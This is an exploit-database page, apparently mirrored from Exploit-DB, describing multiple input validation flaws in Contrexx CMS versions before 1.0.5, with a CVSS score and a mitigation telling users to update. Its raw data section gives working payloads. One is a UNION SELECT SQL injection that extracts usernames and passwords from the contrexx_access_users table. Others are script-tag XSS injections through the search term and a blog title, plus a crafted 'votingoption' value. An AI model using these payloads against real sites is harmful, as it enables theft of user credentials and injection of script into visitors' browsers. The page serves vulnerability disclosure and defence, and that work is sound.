Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Contrexx Multiple Input Validation Vulnerabilities - exploit.company
header-logo
Suggest Exploit
vendor:
Contrexx CMS
by:
Unknown
5.5
CVSS
MEDIUM
HTML Injection, SQL Injection, Information Disclosure
79
CWE
Product Name: Contrexx CMS
Affected Version From: Prior to 1.0.5
Affected Version To: 1.0.4
Patch Exists: YES
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Unknown
Unknown

Contrexx Multiple Input Validation Vulnerabilities

The Contrexx CMS is affected by multiple input validation vulnerabilities that allow for HTML injection, SQL injection, and information disclosure attacks. An attacker can exploit these vulnerabilities by supplying a specially crafted value for the 'votingoption' parameter and submitting the form. Additionally, the vulnerabilities can be exploited through the 'section' and 'term' parameters in specific URLs. These vulnerabilities can be used to carry out attacks such as executing arbitrary JavaScript code (XSS) and retrieving sensitive information from the database.

Mitigation:

Update to Contrexx version 1.0.5 or later to address these vulnerabilities. Additionally, input validation and sanitization should be implemented to prevent similar vulnerabilities in the future.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/14352/info

Contrexx is affected by multiple input validation vulnerabilities. These issues can allow an attacker to carry out HTML injection, SQL injection and information disclosure attacks.

Contrexx versions prior to 1.0.5 are affected. 

supply the 'votingoption' parameter as value="1 /*!50030%20s*/" and submit the form.

/index.php?section=gallery&cmd=showCat&cid=41&pId=1%20/**/UNION/**/%20/**/SELECT/**/%201,1,CONCAT(username,'-',password),1,1,1%20/**/FROM%20contrexx_access_users

/index.php?section=search&term=%22%3E%3Cscr\ipt%3Ealert(%22xss%22)%3C/sc\ript%3E

Create a blog entry with the title <script>alert('xss')</script>

Navigation

Suggest Exploit

Services By CQR